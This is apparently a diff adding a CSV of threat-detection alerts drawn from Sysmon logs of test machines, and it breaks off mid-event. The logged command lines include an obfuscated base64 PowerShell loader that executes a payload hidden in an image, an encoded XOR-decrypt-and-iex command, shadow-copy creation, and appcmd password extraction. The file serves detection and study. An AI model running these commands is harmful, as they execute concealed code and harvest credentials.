+[ T1059 ] wscript or cscript runing script,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (&quot;c:\windows\system32\wscript.exe&quot; /E:vbs c:\windows\temp\icon.ico &quot;powershell -exec bypass -c &quot;&quot;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(&apos;JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp&apos;)))&quot;&quot;&quot;) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-14T11:53:30.022856Z"">
+    </TimeCreated>
+    <EventRecordID>10662</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2004"" ThreadID=""4480"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-14 11:53:29.768</Data>
+    <Data Name=""ProcessGuid"">747F3D96-F639-5D53-0000-0010B0FC2600</Data>
+    <Data Name=""ProcessId"">8180</Data>
+    <Data Name=""Image"">C:\Windows\System32\wscript.exe</Data>
+    <Data Name=""FileVersion"">5.812.10240.16384</Data>
+    <Data Name=""Description"">Microsoft ® Windows Based Script Host</Data>
+    <Data Name=""Product"">Microsoft ® Windows Script Host</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;c:\windows\system32\wscript.exe&quot; /E:vbs c:\windows\temp\icon.ico &quot;powershell -exec bypass -c &quot;&quot;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(&apos;JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp&apos;)))&quot;&quot;&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-F419-5D53-0000-002026910200</Data>
+    <Data Name=""LogonId"">0x29126</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-F639-5D53-0000-001092EE2600</Data>
+    <Data Name=""ParentProcessId"">6000</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.822932,2019-05-27T05:29:18.822932+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir /text:vdir.name ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:18.822932Z"">
+    </TimeCreated>
+    <EventRecordID>5937</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:18.782</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00106FA6FF00</Data>
+    <Data Name=""ProcessId"">1876</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir /text:vdir.name</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557667978.167195,2019-05-12T17:32:58.167195+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:30:46.556756Z"">
+    </TimeCreated>
+    <EventRecordID>16389</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:30:46.275</Data>
+    <Data Name=""ProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
+    <Data Name=""ProcessId"">2936</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010A2862300</Data>
+    <Data Name=""ParentProcessId"">2960</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558969967.478285,2019-05-27T19:12:47.478285+04:00,,Threat,Low,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:47.402708Z"">
+    </TimeCreated>
+    <EventRecordID>6180</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:47.402</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE6F-5CEB-0000-0010F4370C00</Data>
+    <Data Name=""ProcessId"">3448</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
+    <Data Name=""ParentProcessId"">1944</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558969967.478285,2019-05-27T19:12:47.478285+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:47.402708Z"">
+    </TimeCreated>
+    <EventRecordID>6180</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:47.402</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE6F-5CEB-0000-0010F4370C00</Data>
+    <Data Name=""ProcessId"">3448</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
+    <Data Name=""ParentProcessId"">1944</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1558452779.769825,2019-05-21T19:32:59.769825+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( gator4243.hostgator.com ) , IP ( 108.179.232.58 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-21T15:32:59.389278Z"">
+    </TimeCreated>
+    <EventRecordID>4128</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3416"" ThreadID=""3628"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-21 06:58:39.888</Data>
+    <Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
+    <Data Name=""ProcessId"">2432</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.15</Data>
+    <Data Name=""SourceHostname"">IEWIN7..home</Data>
+    <Data Name=""SourcePort"">49703</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">108.179.232.58</Data>
+    <Data Name=""DestinationHostname"">gator4243.hostgator.com</Data>
+    <Data Name=""DestinationPort"">443</Data>
+    <Data Name=""DestinationPortName"">https</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556664747.588976,2019-05-01T02:52:27.588976+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T22:49:10.198351Z"">
+    </TimeCreated>
+    <EventRecordID>10153</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1936"" ThreadID=""1644"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 22:49:09.276</Data>
+    <Data Name=""ProcessGuid"">365ABB72-D0E5-5CC8-0000-0010DADF3E00</Data>
+    <Data Name=""ProcessId"">2892</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-C494-5CC8-0000-0020E4FF0000</Data>
+    <Data Name=""LogonId"">0xffe4</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-D0E4-5CC8-0000-00103CB73E00</Data>
+    <Data Name=""ParentProcessId"">3680</Data>
+    <Data Name=""ParentImage"">C:\Windows\Installer\MSI4FFD.tmp</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\Installer\MSI4FFD.tmp&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.742817,2019-05-27T05:29:18.742817+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;. )&quot; /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
